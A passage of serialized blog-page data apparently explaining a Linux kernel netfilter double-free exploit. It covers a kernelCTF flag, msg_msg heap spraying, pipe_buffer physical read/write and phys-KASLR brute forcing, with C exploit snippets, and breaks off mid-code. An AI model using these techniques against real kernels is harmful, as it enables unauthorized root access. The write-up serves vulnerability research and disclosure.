},[59946],{"type":32,"value":356},{"type":26,"tag":137,"props":59948,"children":59949},{"style":5601},[59950],{"type":32,"value":59951}," INIT_NSPROXY;\n",{"type":26,"tag":137,"props":59953,"children":59954},{"class":5559,"line":6279},[59955,59959,59963,59967,59971,59975,59979,59983],{"type":26,"tag":137,"props":59956,"children":59957},{"style":5584},[59958],{"type":32,"value":58771},{"type":26,"tag":137,"props":59960,"children":59961},{"style":5601},[59962],{"type":32,"value":59285},{"type":26,"tag":137,"props":59964,"children":59965},{"style":5590},[59966],{"type":32,"value":53872},{"type":26,"tag":137,"props":59968,"children":59969},{"style":5601},[59970],{"type":32,"value":11247},{"type":26,"tag":137,"props":59972,"children":59973},{"style":5590},[59974],{"type":32,"value":289},{"type":26,"tag":137,"props":59976,"children":59977},{"style":5601},[59978],{"type":32,"value":58792},{"type":26,"tag":137,"props":59980,"children":59981},{"style":5590},[59982],{"type":32,"value":356},{"type":26,"tag":137,"props":59984,"children":59985},{"style":5601},[59986],{"type":32,"value":59987}," SWITCH_TASK_NAMESPACES;\n",{"type":26,"tag":137,"props":59989,"children":59990},{"class":5559,"line":6288},[59991],{"type":26,"tag":137,"props":59992,"children":59993},{"style":5601},[59994],{"type":32,"value":12908},{"type":26,"tag":118,"props":59996,"children":59998},{"id":59997},"grabbing-the-kernelctf-flag",[59999],{"type":32,"value":60000},"Grabbing the kernelCTF flag",{"type":26,"tag":35,"props":60002,"children":60003},{},[60004,60008,60010,60017],{"type":26,"tag":2210,"props":60005,"children":60007},{"alt":53181,"src":60006},"/posts/netfilter-universal-root-1-day/flag.png",[],{"type":32,"value":60009},"\nYou can find the kernelCTF exploit in our ",{"type":26,"tag":41,"props":60011,"children":60014},{"href":60012,"rel":60013},"https://github.com/otter-sec/OtterRoot/blob/master/kernelctf/exploit.c",[45],[60015],{"type":32,"value":60016},"GitHub",{"type":32,"value":470},{"type":26,"tag":92,"props":60019,"children":60021},{"id":60020},"universal-exploit",[60022],{"type":32,"value":60023},"Universal exploit",{"type":26,"tag":35,"props":60025,"children":60026},{},[60027],{"type":32,"value":60028},"After exploiting KernelCTF, I decided to use this vulnerability to craft a universal exploit (one that works stably regardless of the target without needing to be modified). I took a different approach to avoid some compatibility and reliability pitfalls, the biggest ones being ROP and anything else that relies on kernel data offsets because those change from build to build. It's not uncommon to compile a list of gadgets for the different builds but it makes more sense just to avoid the trouble entirely.",{"type":26,"tag":118,"props":60030,"children":60032},{"id":60031},"pivot-capability-using-msg_msg-mlistnext-pointer",[60033],{"type":32,"value":60034},"Pivot capability using msg_msg->mlist.next pointer",{"type":26,"tag":35,"props":60036,"children":60037},{},[60038,60040,60046,60048,60053,60055,60061],{"type":32,"value":60039},"Using the double-free vulnerability we can overlap a ",{"type":26,"tag":130,"props":60041,"children":60043},{"className":60042},[],[60044],{"type":32,"value":60045},"msg_msg",{"type":32,"value":60047}," object with with ",{"type":26,"tag":130,"props":60049,"children":60051},{"className":60050},[],[60052],{"type":32,"value":57701},{"type":32,"value":60054}," and control the ",{"type":26,"tag":130,"props":60056,"children":60058},{"className":60057},[],[60059],{"type":32,"value":60060},"m_list.next",{"type":32,"value":60062}," pointer.",{"type":26,"tag":5512,"props":60064,"children":60066},{"className":31704,"code":60065,"language":31706,"meta":7,"style":7},"/* one msg_msg structure for each message */\nstruct msg_msg {\n struct list_head m_list;\n long m_type;\n size_t m_ts;  /* message text size */\n struct msg_msgseg *next;\n void *security;\n /* the actual message follows immediately */\n};\n[...]\nstruct list_head {\n struct list_head *next, *prev;\n};\n",[60067],{"type":26,"tag":130,"props":60068,"children":60069},{"__ignoreMap":7},[60070,60078,60094,60115,60128,60146,60171,60187,60195,60202,60209,60217,60249],{"type":26,"tag":137,"props":60071,"children":60072},{"class":5559,"line":5560},[60073],{"type":26,"tag":137,"props":60074,"children":60075},{"style":5564},[60076],{"type":32,"value":60077},"/* one msg_msg structure for each message */\n",{"type":26,"tag":137,"props":60079,"children":60080},{"class":5559,"line":5412},[60081,60085,60090],{"type":26,"tag":137,"props":60082,"children":60083},{"style":5573},[60084],{"type":32,"value":11990},{"type":26,"tag":137,"props":60086,"children":60087},{"style":6009},[60088],{"type":32,"value":60089}," msg_msg",{"type":26,"tag":137,"props":60091,"children":60092},{"style":5601},[60093],{"type":32,"value":5875},{"type":26,"tag":137,"props":60095,"children":60096},{"class":5559,"line":5417},[60097,60101,60106,60111],{"type":26,"tag":137,"props":60098,"children":60099},{"style":5573},[60100],{"type":32,"value":23744},{"type":26,"tag":137,"props":60102,"children":60103},{"style":6009},[60104],{"type":32,"value":60105}," list_head",{"type":26,"tag":137,"props":60107,"children":60108},{"style":5584},[60109],{"type":32,"value":60110}," m_list",{"type":26,"tag":137,"props":60112,"children":60113},{"style":5601},[60114],{"type":32,"value":5604},{"type":26,"tag":137,"props":60116,"children":60117},{"class":5559,"line":5642},[60118,60123],{"type":26,"tag":137,"props":60119,"children":60120},{"style":5573},[60121],{"type":32,"value":60122}," long",{"type":26,"tag":137,"props":60124,"children":60125},{"style":5601},[60126],{"type":32,"value":60127}," m_type;\n",{"type":26,"tag":137,"props":60129,"children":60130},{"class":5559,"line":5745},[60131,60136,60141],{"type":26,"tag":137,"props":60132,"children":60133},{"style":5573},[60134],{"type":32,"value":60135}," size_t",{"type":26,"tag":137,"props":60137,"children":60138},{"style":5601},[60139],{"type":32,"value":60140}," m_ts;",{"type":26,"tag":137,"props":60142,"children":60143},{"style":5564},[60144],{"type":32,"value":60145},"  /* message text size */\n",{"type":26,"tag":137,"props":60147,"children":60148},{"class":5559,"line":5850},[60149,60153,60158,60162,60167],{"type":26,"tag":137,"props":60150,"children":60151},{"style":5573},[60152],{"type":32,"value":23744},{"type":26,"tag":137,"props":60154,"children":60155},{"style":6009},[60156],{"type":32,"value":60157}," msg_msgseg",{"type":26,"tag":137,"props":60159,"children":60160},{"style":5573},[60161],{"type":32,"value":12406},{"type":26,"tag":137,"props":60163,"children":60164},{"style":5584},[60165],{"type":32,"value":60166},"next",{"type":26,"tag":137,"props":60168,"children":60169},{"style":5601},[60170],{"type":32,"value":5604},{"type":26,"tag":137,"props":60172,"children":60173},{"class":5559,"line":5878},[60174,60178,60182],{"type":26,"tag":137,"props":60175,"children":60176},{"style":5573},[60177],{"type":32,"value":53652},{"type":26,"tag":137,"props":60179,"children":60180},{"style":5590},[60181],{"type":32,"value":12406},{"type":26,"tag":137,"props":60183,"children":60184},{"style":5601},[60185],{"type":32,"value":60186},"security;\n",{"type":26,"tag":137,"props":60188,"children":60189},{"class":5559,"line":5891},[60190],{"type":26,"tag":137,"props":60191,"children":60192},{"style":5564},[60193],{"type":32,"value":60194}," /* the actual message follows immediately */\n",{"type":26,"tag":137,"props":60196,"children":60197},{"class":5559,"line":5909},[60198],{"type":26,"tag":137,"props":60199,"children":60200},{"style":5601},[60201],{"type":32,"value":19170},{"type":26,"tag":137,"props":60203,"children":60204},{"class":5559,"line":5930},[60205],{"type":26,"tag":137,"props":60206,"children":60207},{"style":5601},[60208],{"type":32,"value":12908},{"type":26,"tag":137,"props":60210,"children":60211},{"class":5559,"line":5939},[60212],{"type":26,"tag":137,"props":60213,"children":60214},{"style":5601},[60215],{"type":32,"value":60216},"struct list_head {\n",{"type":26,"tag":137,"props":60218,"children":60219},{"class":5559,"line":6191},[60220,60224,60228,60232,60236,60240,60244],{"type":26,"tag":137,"props":60221,"children":60222},{"style":5573},[60223],{"type":32,"value":23744},{"type":26,"tag":137,"props":60225,"children":60226},{"style":6009},[60227],{"type":32,"value":60105},{"type":26,"tag":137,"props":60229,"children":60230},{"style":5573},[60231],{"type":32,"value":12406},{"type":26,"tag":137,"props":60233,"children":60234},{"style":5584},[60235],{"type":32,"value":60166},{"type":26,"tag":137,"props":60237,"children":60238},{"style":5601},[60239],{"type":32,"value":1108},{"type":26,"tag":137,"props":60241,"children":60242},{"style":5590},[60243],{"type":32,"value":7152},{"type":26,"tag":137,"props":60245,"children":60246},{"style":5601},[60247],{"type":32,"value":60248},"prev;\n",{"type":26,"tag":137,"props":60250,"children":60251},{"class":5559,"line":6208},[60252],{"type":26,"tag":137,"props":60253,"children":60254},{"style":5601},[60255],{"type":32,"value":19170},{"type":26,"tag":35,"props":60257,"children":60258},{},[60259,60261,60267,60269,60274],{"type":32,"value":60260},"This is particularly interesting if we send messages of different sizes on the same queue, making the ",{"type":26,"tag":130,"props":60262,"children":60264},{"className":60263},[],[60265],{"type":32,"value":60266},"mlist.next",{"type":32,"value":60268}," pointer of a message that lives in one cache point into a different cache. So, by spraying ",{"type":26,"tag":130,"props":60270,"children":60272},{"className":60271},[],[60273],{"type":32,"value":60045},{"type":32,"value":60275}," in kmalloc-cg-256 with a secondary message in each queue living in kmalloc-cg-1k.",{"type":26,"tag":35,"props":60277,"children":60278},{},[60279,60281,60286,60288],{"type":32,"value":60280},"By incrementing the next pointer of our controllable ",{"type":26,"tag":130,"props":60282,"children":60284},{"className":60283},[],[60285],{"type":32,"value":60045},{"type":32,"value":60287}," by 256, we are able to make it point to the different secondary message that is already referenced by a different primary message, creating a duplicated reference. We allow an easy way of pivoting our double-free capabilities to other caches and attacking a greater variety of objects.\n",{"type":26,"tag":2210,"props":60289,"children":60291},{"alt":53181,"src":60290},"/posts/netfilter-universal-root-1-day/msg-msg.png",[],{"type":26,"tag":5512,"props":60293,"children":60295},{"className":31704,"code":60294,"language":31706,"meta":7,"style":7},"[...]\n    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n    msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);\n    int qid[SPRAY];\n    for (int i = 0; i \u003C SPRAY; i++)\n    {\n        qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n        if (qid[i] \u003C 0)\n        {\n            perror(\"[-] msgget\");\n        }\n        *(uint32_t *)msg->mtext = i;\n        *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;\n        msg->mtype = MTYPE_PRIMARY;\n        msgsnd(qid[i], msg, 0xe8 - 48, 0);\n        msg->mtype = MTYPE_SECONDARY;\n        msgsnd(qid[i], msg, 1024 - 48, 0);\n    }\n    // Prepare evil msg\n    int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n    if (evilqid \u003C 0)\n    {\n        perror(\"[-] msgget\");\n    }\n[...] // trigger double-free in kmalloc-256\n",[60296],{"type":26,"tag":130,"props":60297,"children":60298},{"__ignoreMap":7},[60299,60306,60314,60340,60357,60405,60412,60452,60484,60491,60512,60519,60566,60630,60656,60702,60726,60770,60777,60785,60821,60845,60852,60872,60879],{"type":26,"tag":137,"props":60300,"children":60301},{"class":5559,"line":5560},[60302],{"type":26,"tag":137,"props":60303,"children":60304},{"style":5601},[60305],{"type":32,"value":12908},{"type":26,"tag":137,"props":60307,"children":60308},{"class":5559,"line":5412},[60309],{"type":26,"tag":137,"props":60310,"children":60311},{"style":5601},[60312],{"type":32,"value":60313},"    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n",{"type":26,"tag":137,"props":60315,"children":60316},{"class":5559,"line":5417},[60317,60322,60326,60330,60335],{"type":26,"tag":137,"props":60318,"children":60319},{"style":5601},[60320],{"type":32,"value":60321},"    msg_t *msg = calloc(1, ",{"type":26,"tag":137,"props":60323,"children":60324},{"style":6009},[60325],{"type":32,"value":57930},{"type":26,"tag":137,"props":60327,"children":60328},{"style":5601},[60329],{"type":32,"value":165},{"type":26,"tag":137,"props":60331,"children":60332},{"style":6009},[60333],{"type":32,"value":60334},"msg_t",{"type":26,"tag":137,"props":60336,"children":60337},{"style":5601},[60338],{"type":32,"value":60339},") + 0xe8 - 48);\n",{"type":26,"tag":137,"props":60341,"children":60342},{"class":5559,"line":5642},[60343,60347,60352],{"type":26,"tag":137,"props":60344,"children":60345},{"style":5573},[60346],{"type":32,"value":21670},{"type":26,"tag":137,"props":60348,"children":60349},{"style":5584},[60350],{"type":32,"value":60351}," qid",{"type":26,"tag":137,"props":60353,"children":60354},{"style":5601},[60355],{"type":32,"value":60356},"[SPRAY];\n",{"type":26,"tag":137,"props":60358,"children":60359},{"class":5559,"line":5745},[60360,60364,60368,60372,60376,60380,60384,60388,60392,60397,60401],{"type":26,"tag":137,"props":60361,"children":60362},{"style":5610},[60363],{"type":32,"value":5613},{"type":26,"tag":137,"props":60365,"children":60366},{"style":5601},[60367],{"type":32,"value":4625},{"type":26,"tag":137,"props":60369,"children":60370},{"style":5573},[60371],{"type":32,"value":21640},{"type":26,"tag":137,"props":60373,"children":60374},{"style":5601},[60375],{"type":32,"value":57147},{"type":26,"tag":137,"props":60377,"children":60378},{"style":5590},[60379],{"type":32,"value":289},{"type":26,"tag":137,"props":60381,"children":60382},{"style":5626},[60383],{"type":32,"value":5629},{"type":26,"tag":137,"props":60385,"children":60386},{"style":5601},[60387],{"type":32,"value":53836},{"type":26,"tag":137,"props":60389,"children":60390},{"style":5590},[60391],{"type":32,"value":8391},{"type":26,"tag":137,"props":60393,"children":60394},{"style":5601},[60395],{"type":32,"value":60396}," SPRAY; i",{"type":26,"tag":137,"props":60398,"children":60399},{"style":5590},[60400],{"type":32,"value":53872},{"type":26,"tag":137,"props":60402,"children":60403},{"style":5601},[60404],{"type":32,"value":5742},{"type":26,"tag":137,"props":60406,"children":60407},{"class":5559,"line":5850},[60408],{"type":26,"tag":137,"props":60409,"children":60410},{"style":5601},[60411],{"type":32,"value":31781},{"type":26,"tag":137,"props":60413,"children":60414},{"class":5559,"line":5878},[60415,60420,60424,60428,60433,60438,60443,60447],{"type":26,"tag":137,"props":60416,"children":60417},{"style":5584},[60418],{"type":32,"value":60419},"        qid",{"type":26,"tag":137,"props":60421,"children":60422},{"style":5601},[60423],{"type":32,"value":57199},{"type":26,"tag":137,"props":60425,"children":60426},{"style":5590},[60427],{"type":32,"value":289},{"type":26,"tag":137,"props":60429,"children":60430},{"style":5682},[60431],{"type":32,"value":60432}," msgget",{"type":26,"tag":137,"props":60434,"children":60435},{"style":5601},[60436],{"type":32,"value":60437},"(IPC_PRIVATE, ",{"type":26,"tag":137,"props":60439,"children":60440},{"style":5626},[60441],{"type":32,"value":60442},"0666",{"type":26,"tag":137,"props":60444,"children":60445},{"style":5590},[60446],{"type":32,"value":6850},{"type":26,"tag":137,"props":60448,"children":60449},{"style":5601},[60450],{"type":32,"value":60451}," IPC_CREAT);\n",{"type":26,"tag":137,"props":60453,"children":60454},{"class":5559,"line":5891},[60455,60459,60463,60468,60472,60476,60480],{"type":26,"tag":137,"props":60456,"children":60457},{"style":5610},[60458],{"type":32,"value":5856},{"type":26,"tag":137,"props":60460,"children":60461},{"style":5601},[60462],{"type":32,"value":4625},{"type":26,"tag":137,"props":60464,"children":60465},{"style":5584},[60466],{"type":32,"value":60467},"qid",{"type":26,"tag":137,"props":60469,"children":60470},{"style":5601},[60471],{"type":32,"value":57199},{"type":26,"tag":137,"props":60473,"children":60474},{"style":5590},[60475],{"type":32,"value":8391},{"type":26,"tag":137,"props":60477,"children":60478},{"style":5626},[60479],{"type":32,"value":5629},{"type":26,"tag":137,"props":60481,"children":60482},{"style":5601},[60483],{"type":32,"value":5742},{"type":26,"tag":137,"props":60485,"children":60486},{"class":5559,"line":5909},[60487],{"type":26,"tag":137,"props":60488,"children":60489},{"style":5601},[60490],{"type":32,"value":34254},{"type":26,"tag":137,"props":60492,"children":60493},{"class":5559,"line":5930},[60494,60499,60503,60508],{"type":26,"tag":137,"props":60495,"children":60496},{"style":5682},[60497],{"type":32,"value":60498},"            perror",{"type":26,"tag":137,"props":60500,"children":60501},{"style":5601},[60502],{"type":32,"value":165},{"type":26,"tag":137,"props":60504,"children":60505},{"style":6837},[60506],{"type":32,"value":60507},"\"[-] msgget\"",{"type":26,"tag":137,"props":60509,"children":60510},{"style":5601},[60511],{"type":32,"value":6430},{"type":26,"tag":137,"props":60513,"children":60514},{"class":5559,"line":5939},[60515],{"type":26,"tag":137,"props":60516,"children":60517},{"style":5601},[60518],{"type":32,"value":5936},{"type":26,"tag":137,"props":60520,"children":60521},{"class":5559,"line":6191},[60522,60526,60530,60535,60539,60543,60548,60552,60557,60561],{"type":26,"tag":137,"props":60523,"children":60524},{"style":5590},[60525],{"type":32,"value":10336},{"type":26,"tag":137,"props":60527,"children":60528},{"style":5601},[60529],{"type":32,"value":165},{"type":26,"tag":137,"props":60531,"children":60532},{"style":5573},[60533],{"type":32,"value":60534},"uint32_t",{"type":26,"tag":137,"props":60536,"children":60537},{"style":5590},[60538],{"type":32,"value":12406},{"type":26,"tag":137,"props":60540,"children":60541},{"style":5601},[60542],{"type":32,"value":200},{"type":26,"tag":137,"props":60544,"children":60545},{"style":5584},[60546],{"type":32,"value":60547},"msg",{"type":26,"tag":137,"props":60549,"children":60550},{"style":5601},[60551],{"type":32,"value":16348},{"type":26,"tag":137,"props":60553,"children":60554},{"style":5584},[60555],{"type":32,"value":60556},"mtext",{"type":26,"tag":137,"props":60558,"children":60559},{"style":5590},[60560],{"type":32,"value":5593},{"type":26,"tag":137,"props":60562,"children":60563},{"style":5601},[60564],{"type":32,"value":60565}," i;\n",{"type":26,"tag":137,"props":60567,"children":60568},{"class":5559,"line":6208},[60569,60573,60577,60581,60585,60589,60593,60597,60601,60605,60609,60613,60617,60621,60626],{"type":26,"tag":137,"props":60570,"children":60571},{"style":5590},[60572],{"type":32,"value":10336},{"type":26,"tag":137,"props":60574,"children":60575},{"style":5601},[60576],{"type":32,"value":165},{"type":26,"tag":137,"props":60578,"children":60579},{"style":5573},[60580],{"type":32,"value":58237},{"type":26,"tag":137,"props":60582,"children":60583},{"style":5590},[60584],{"type":32,"value":12406},{"type":26,"tag":137,"props":60586,"children":60587},{"style":5601},[60588],{"type":32,"value":200},{"type":26,"tag":137,"props":60590,"children":60591},{"style":5590},[60592],{"type":32,"value":5694},{"type":26,"tag":137,"props":60594,"children":60595},{"style":5584},[60596],{"type":32,"value":60547},{"type":26,"tag":137,"props":60598,"children":60599},{"style":5601},[60600],{"type":32,"value":16348},{"type":26,"tag":137,"props":60602,"children":60603},{"style":5584},[60604],{"type":32,"value":60556},{"type":26,"tag":137,"props":60606,"children":60607},{"style":5601},[60608],{"type":32,"value":3016},{"type":26,"tag":137,"props":60610,"children":60611},{"style":5626},[60612],{"type":32,"value":6663},{"type":26,"tag":137,"props":60614,"children":60615},{"style":5601},[60616],{"type":32,"value":11247},{"type":26,"tag":137,"props":60618,"children":60619},{"style":5590},[60620],{"type":32,"value":289},{"type":26,"tag":137,"props":60622,"children":60623},{"style":5626},[60624],{"type":32,"value":60625}," 0xdeadbeefcafebabe",{"type":26,"tag":137,"props":60627,"children":60628},{"style":5601},[60629],{"type":32,"value":5604},{"type":26,"tag":137,"props":60631,"children":60632},{"class":5559,"line":6225},[60633,60638,60642,60647,60651],{"type":26,"tag":137,"props":60634,"children":60635},{"style":5584},[60636],{"type":32,"value":60637},"        msg",{"type":26,"tag":137,"props":60639,"children":60640},{"style":5601},[60641],{"type":32,"value":16348},{"type":26,"tag":137,"props":60643,"children":60644},{"style":5584},[60645],{"type":32,"value":60646},"mtype",{"type":26,"tag":137,"props":60648,"children":60649},{"style":5590},[60650],{"type":32,"value":5593},{"type":26,"tag":137,"props":60652,"children":60653},{"style":5601},[60654],{"type":32,"value":60655}," MTYPE_PRIMARY;\n",{"type":26,"tag":137,"props":60657,"children":60658},{"class":5559,"line":6238},[60659,60664,60668,60672,60677,60681,60685,60690,60694,60698],{"type":26,"tag":137,"props":60660,"children":60661},{"style":5682},[60662],{"type":32,"value":60663},"        msgsnd",{"type":26,"tag":137,"props":60665,"children":60666},{"style":5601},[60667],{"type":32,"value":165},{"type":26,"tag":137,"props":60669,"children":60670},{"style":5584},[60671],{"type":32,"value":60467},{"type":26,"tag":137,"props":60673,"children":60674},{"style":5601},[60675],{"type":32,"value":60676},"[i], msg, ",{"type":26,"tag":137,"props":60678,"children":60679},{"style":5626},[60680],{"type":32,"value":58573},{"type":26,"tag":137,"props":60682,"children":60683},{"style":5590},[60684],{"type":32,"value":53858},{"type":26,"tag":137,"props":60686,"children":60687},{"style":5626},[60688],{"type":32,"value":60689}," 48",{"type":26,"tag":137,"props":60691,"children":60692},{"style":5601},[60693],{"type":32,"value":1108},{"type":26,"tag":137,"props":60695,"children":60696},{"style":5626},[60697],{"type":32,"value":1817},{"type":26,"tag":137,"props":60699,"children":60700},{"style":5601},[60701],{"type":32,"value":6430},{"type":26,"tag":137,"props":60703,"children":60704},{"class":5559,"line":6247},[60705,60709,60713,60717,60721],{"type":26,"tag":137,"props":60706,"children":60707},{"style":5584},[60708],{"type":32,"value":60637},{"type":26,"tag":137,"props":60710,"children":60711},{"style":5601},[60712],{"type":32,"value":16348},{"type":26,"tag":137,"props":60714,"children":60715},{"style":5584},[60716],{"type":32,"value":60646},{"type":26,"tag":137,"props":60718,"children":60719},{"style":5590},[60720],{"type":32,"value":5593},{"type":26,"tag":137,"props":60722,"children":60723},{"style":5601},[60724],{"type":32,"value":60725}," MTYPE_SECONDARY;\n",{"type":26,"tag":137,"props":60727,"children":60728},{"class":5559,"line":6270},[60729,60733,60737,60741,60745,60750,60754,60758,60762,60766],{"type":26,"tag":137,"props":60730,"children":60731},{"style":5682},[60732],{"type":32,"value":60663},{"type":26,"tag":137,"props":60734,"children":60735},{"style":5601},[60736],{"type":32,"value":165},{"type":26,"tag":137,"props":60738,"children":60739},{"style":5584},[60740],{"type":32,"value":60467},{"type":26,"tag":137,"props":60742,"children":60743},{"style":5601},[60744],{"type":32,"value":60676},{"type":26,"tag":137,"props":60746,"children":60747},{"style":5626},[60748],{"type":32,"value":60749},"1024",{"type":26,"tag":137,"props":60751,"children":60752},{"style":5590},[60753],{"type":32,"value":53858},{"type":26,"tag":137,"props":60755,"children":60756},{"style":5626},[60757],{"type":32,"value":60689},{"type":26,"tag":137,"props":60759,"children":60760},{"style":5601},[60761],{"type":32,"value":1108},{"type":26,"tag":137,"props":60763,"children":60764},{"style":5626},[60765],{"type":32,"value":1817},{"type":26,"tag":137,"props":60767,"children":60768},{"style":5601},[60769],{"type":32,"value":6430},{"type":26,"tag":137,"props":60771,"children":60772},{"class":5559,"line":6279},[60773],{"type":26,"tag":137,"props":60774,"children":60775},{"style":5601},[60776],{"type":32,"value":5945},{"type":26,"tag":137,"props":60778,"children":60779},{"class":5559,"line":6288},[60780],{"type":26,"tag":137,"props":60781,"children":60782},{"style":5564},[60783],{"type":32,"value":60784},"    // Prepare evil msg\n",{"type":26,"tag":137,"props":60786,"children":60787},{"class":5559,"line":6355},[60788,60792,60797,60801,60805,60809,60813,60817],{"type":26,"tag":137,"props":60789,"children":60790},{"style":5573},[60791],{"type":32,"value":21670},{"type":26,"tag":137,"props":60793,"children":60794},{"style":5601},[60795],{"type":32,"value":60796}," evilqid ",{"type":26,"tag":137,"props":60798,"children":60799},{"style":5590},[60800],{"type":32,"value":289},{"type":26,"tag":137,"props":60802,"children":60803},{"style":5682},[60804],{"type":32,"value":60432},{"type":26,"tag":137,"props":60806,"children":60807},{"style":5601},[60808],{"type":32,"value":60437},{"type":26,"tag":137,"props":60810,"children":60811},{"style":5626},[60812],{"type":32,"value":60442},{"type":26,"tag":137,"props":60814,"children":60815},{"style":5590},[60816],{"type":32,"value":6850},{"type":26,"tag":137,"props":60818,"children":60819},{"style":5601},[60820],{"type":32,"value":60451},{"type":26,"tag":137,"props":60822,"children":60823},{"class":5559,"line":6363},[60824,60828,60833,60837,60841],{"type":26,"tag":137,"props":60825,"children":60826},{"style":5610},[60827],{"type":32,"value":14870},{"type":26,"tag":137,"props":60829,"children":60830},{"style":5601},[60831],{"type":32,"value":60832}," (evilqid ",{"type":26,"tag":137,"props":60834,"children":60835},{"style":5590},[60836],{"type":32,"value":8391},{"type":26,"tag":137,"props":60838,"children":60839},{"style":5626},[60840],{"type":32,"value":5629},{"type":26,"tag":137,"props":60842,"children":60843},{"style":5601},[60844],{"type":32,"value":5742},{"type":26,"tag":137,"props":60846,"children":60847},{"class":5559,"line":6393},[60848],{"type":26,"tag":137,"props":60849,"children":60850},{"style":5601},[60851],{"type":32,"value":31781},{"type":26,"tag":137,"props":60853,"children":60854},{"class":5559,"line":6401},[60855,60860,60864,60868],{"type":26,"tag":137,"props":60856,"children":60857},{"style":5682},[60858],{"type":32,"value":60859},"        perror",{"type":26,"tag":137,"props":60861,"children":60862},{"style":5601},[60863],{"type":32,"value":165},{"type":26,"tag":137,"props":60865,"children":60866},{"style":6837},[60867],{"type":32,"value":60507},{"type":26,"tag":137,"props":60869,"children":60870},{"style":5601},[60871],{"type":32,"value":6430},{"type":26,"tag":137,"props":60873,"children":60874},{"class":5559,"line":6433},[60875],{"type":26,"tag":137,"props":60876,"children":60877},{"style":5601},[60878],{"type":32,"value":5945},{"type":26,"tag":137,"props":60880,"children":60881},{"class":5559,"line":6441},[60882],{"type":26,"tag":137,"props":60883,"children":60884},{"style":5601},[60885],{"type":32,"value":60886},"[...] // trigger double-free in kmalloc-256\n",{"type":26,"tag":118,"props":60888,"children":60890},{"id":60889},"using-pipe_buffer-page-pointer-for-physical-readwrite",[60891],{"type":32,"value":60892},"Using pipe_buffer->page pointer for physical read/write",{"type":26,"tag":35,"props":60894,"children":60895},{},[60896,60898,60904,60905,60911,60912,60918,60920,60926],{"type":32,"value":60897},"Now that we have increased the reach of our double-free, it's probably a good idea to go to ",{"type":26,"tag":130,"props":60899,"children":60901},{"className":60900},[],[60902],{"type":32,"value":60903},"kmalloc-1k",{"type":32,"value":3339},{"type":26,"tag":130,"props":60906,"children":60908},{"className":60907},[],[60909],{"type":32,"value":60910},"overlap pipe_buffer",{"type":32,"value":2081},{"type":26,"tag":130,"props":60913,"children":60915},{"className":60914},[],[60916],{"type":32,"value":60917},"skbuf",{"type":32,"value":60919}," data to control the ",{"type":26,"tag":130,"props":60921,"children":60923},{"className":60922},[],[60924],{"type":32,"value":60925},"page",{"type":32,"value":60927}," field.",{"type":26,"tag":35,"props":60929,"children":60930},{},[60931,60932,60937,60939,60945,60947],{"type":32,"value":19206},{"type":26,"tag":130,"props":60933,"children":60935},{"className":60934},[],[60936],{"type":32,"value":60925},{"type":32,"value":60938}," field is a pointer into ",{"type":26,"tag":130,"props":60940,"children":60942},{"className":60941},[],[60943],{"type":32,"value":60944},"vmemmap_base",{"type":32,"value":60946},", which contains all page structs used to track memory mapped to the kernel. This pointer is used to fetch the address of the data associated with a given pipe when reading/writing.\n",{"type":26,"tag":2210,"props":60948,"children":60950},{"alt":53181,"src":60949},"/posts/netfilter-universal-root-1-day/pipe-buffer.png",[],{"type":26,"tag":35,"props":60952,"children":60953},{},[60954,60956,60961],{"type":32,"value":60955},"This now allows us to navigate the ",{"type":26,"tag":130,"props":60957,"children":60959},{"className":60958},[],[60960],{"type":32,"value":60944},{"type":32,"value":60962}," array and use our pipe as an interface to read/write kernel memory directly.",{"type":26,"tag":118,"props":60964,"children":60966},{"id":60965},"bruteforce-physical-kernel-base",[60967],{"type":32,"value":60968},"Bruteforce physical kernel base",{"type":26,"tag":35,"props":60970,"children":60971},{},[60972,60974,60980,60982,60987,60989,60995],{"type":32,"value":60973},"With the capability to iterate over kernel memory pages and read/write them, we could easily look for any value we want to overwrite, such as ",{"type":26,"tag":130,"props":60975,"children":60977},{"className":60976},[],[60978],{"type":32,"value":60979},"modprobe_path",{"type":32,"value":60981},". Keep in mind that simply searching page by page from the start of ",{"type":26,"tag":130,"props":60983,"children":60985},{"className":60984},[],[60986],{"type":32,"value":60944},{"type":32,"value":60988}," can be very time-consuming because the physical address at which the kernel base is loaded is randomized. However, the start of the kernel base is always aligned by a constant ",{"type":26,"tag":130,"props":60990,"children":60992},{"className":60991},[],[60993],{"type":32,"value":60994},"PHYSICAL_ALIGN",{"type":32,"value":60996}," value, 0x200000 by default in amd64, so we can significantly speed up our search by first only looking at aligned addresses for something that looks like the kernel base and then start a page by page search from there.",{"type":26,"tag":5512,"props":60998,"children":61000},{"className":31704,"code":60999,"language":31706,"meta":7,"style":7},"[...]\n// Bruteforce phys-KASLR\n    uint64_t kernel_base;\n    bool found = false;\n    uint8_t data[PAGE_SIZE] = {0};\n    puts(\"[*] bruteforce phys-KASLR\");\n    for (uint64_t i = 0;; i++)\n    {\n        kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);\n        pipebuf->page = vmemmap_base + kernel_base;\n        pipebuf->offset = 0;\n        pipebuf->len = PAGE_SIZE + 1;\n[...]\n        for (int j = 0; j \u003C PIPE_SPRAY; j++)\n        {\n            memset(&data, 0, PAGE_SIZE);\n            int count;\n            if (count = read(pfd[j][0], &data, PAGE_SIZE) \u003C 0)\n            {\n                continue;\n            }\n[...]\n\n            if (is_kernel_base(data)) // [1] identify kernel base\n            {\n                found = true;\n                break;\n            }\n        }\n\n[...]\n",[61001],{"type":26,"tag":130,"props":61002,"children":61003},{"__ignoreMap":7},[61004,61011,61019,61027,61051,61084,61104,61144,61151,61195,61229,61256,61292,61299,61345,61352,61382,61395,61460,61467,61479,61487,61494,61501,61527,61534,61554,61566,61573,61580,61587],{"type":26,"tag":137,"props":61005,"children":61006},{"class":5559,"line":5560},[61007],{"type":26,"tag":137,"props":61008,"children":61009},{"style":5601},[61010],{"type":32,"value":12908},{"type":26,"tag":137,"props":61012,"children":61013},{"class":5559,"line":5412},[61014],{"type":26,"tag":137,"props":61015,"children":61016},{"style":5601},[61017],{"type":32,"value":61018},"// Bruteforce phys-KASLR\n",{"type":26,"tag":137,"props":61020,"children":61021},{"class":5559,"line":5417},[61022],{"type":26,"tag":137,"props":61023,"children":61024},{"style":5601},[61025],{"type":32,"value":61026},"    uint64_t 